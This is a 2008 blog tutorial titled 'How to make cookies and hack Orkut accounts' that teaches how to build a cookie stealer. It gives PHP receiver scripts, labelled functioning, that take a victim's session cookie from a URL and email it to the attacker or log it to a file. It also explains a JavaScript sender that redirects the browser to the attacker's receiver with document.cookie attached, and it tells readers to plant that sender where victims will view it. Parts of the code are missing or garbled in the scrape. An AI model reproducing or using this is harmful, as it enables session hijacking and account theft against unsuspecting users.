Best 2 Know

The Ultimate Blogging Resource

  • Advertising
  • WebHosting
  • Contact Us
  • Blogger
    • Blogger Templates
    • Blogger Tutorials
  • Browser
    • Firefox
    • Google Chrome
  • Google
  • Internet
    • Facebook
    • Twitter
  • Thesis
  • Windows
  • WordPress
    • WordPress Themes
    • WordPress Plugins
  • More
    • Linux
    • Review
    • Solutions
    • Announcements

How to make cookies and hack Orkut accounts

Written by The Invisible

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it’s just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver’s job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, “page.php?arg1=value”). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We’ll look at both.

First, let’s look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS[“cookie”]; // line 2
mail(” me@mydomain.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it “, “Cookie stealer report”, $cookie); // line 3
?> // line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL (“stealer.php?cookie=x”) and stores it in the variable $cookie.
Line 3 accesses PHP’s mail() function and sends the cookie to ” me@mydomain.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ” with the subject of “Cookie stealer report”.
Line 4 tells the server that the PHP code ends here.

Next, we’ll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS[“cookie”]; // line 2
$file = fopen(‘cookielog.txt’, ‘a’); // line 3
fwrite($file, $cookie . “\n\n”); // line 4
?> // line 5

Lines 1 and 2 are the same as before.
Line 3 opens the file “cookielog.txt” for writing, then stores the file’s handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and “\n\n” combines the two strings as one. The “\n\n” acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.

Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3

Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).

There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

Subscribe via Email

Share this:

  • Twitter
  • Facebook
  • Pocket
  • Print
  • Email

Related

March 12, 2008 Ritesh Sanap Internet Orkut tricks

Post navigation

Previous Previous post: Setting Windows Explorer Background Images
Next Next post: Use Google to get Serial No of any Software

Currently Trending

  • Windows Vista CD key
  • How to download Specific parts of YouTube videos
  • HORIZONTAL AND VERTICAL SPACING
  • How to Change the Welcome/Login Screen in Windows XP ?
  • How to Increase Dropbox upload speed
  • Setting Windows Explorer Background Images
  • How to Make DNS Propagation Faster
  • Free Online Angry Birds game
  • Yet Another Related Posts Plugin ( YARPP ) shows double results
  • Related Post Plugin for wordpress

Random Posts

How to watch Hulu outside US

February 19, 2013 By Ritesh Sanap 1 Comment

How to add Breadcrumbs in thesis

April 22, 2011 By Ritesh Sanap 10 Comments

How to Check if ISP is limiting Download Speed

September 16, 2013 By Ritesh Sanap Leave a Comment

How to Automatically Optimize Images in WordPress

August 26, 2011 By Ritesh Sanap 3 Comments

20 Ways to Make Money Online – eBook

August 10, 2008 By Ritesh Sanap Leave a Comment

WordPress

HTTP2 Server Push for W3 Total Cache Minify plugin

August 17, 2016 By Ritesh Sanap 5 Comments

How to Disable Emojis in WordPress

January 6, 2016 By Ritesh Sanap Leave a Comment

JetPack Related posts and Sharing not working with NGINX

November 10, 2015 By Ritesh Sanap Leave a Comment

Simply Pure – WordPress Theme

November 2, 2014 By Ritesh Sanap 2 Comments

Advanced What should we Write about next? – WordPress Plugin

July 28, 2014 By Ritesh Sanap Leave a Comment

How to Disable Self Pingback or TrackBack

January 16, 2014 By Ritesh Sanap Leave a Comment

BlueStrap – WordPress Theme

January 1, 2014 By Ritesh Sanap 15 Comments

How to Create Multiple Excerpts in WordPress

December 24, 2013 By Ritesh Sanap Leave a Comment

How to Disable Auto Update in WordPress

November 21, 2013 By Ritesh Sanap Leave a Comment

How to Delete Feedbacks from JetPack Contact Form

November 19, 2013 By Ritesh Sanap 9 Comments

Recent Posts

  • HTTP2 Server Push for W3 Total Cache Minify plugin
  • How to show hidden files and folders in Mac OS X
  • How to Disable Emojis in WordPress
  • Canva – Online Photo Editor
  • JetPack Related posts and Sharing not working with NGINX

Archives

Recommends

  • DigitalOcean – Cloud Hosting
  • Dropbox – Cloud Storage
  • Elegant Themes – WordPress Themes
  • LastPass – Password Manager
  • Like us on Facebook
  • Follow on Twitter
  • +1 on Google
  • Subscribe via Email
  • RSS Feed

© 2021 Best 2 Know · All Rights Reserved · We ♥ DigitalOcean

loading Cancel
Post was not sent - check your email addresses!
Email check failed, please try again
Sorry, your blog cannot share posts by email.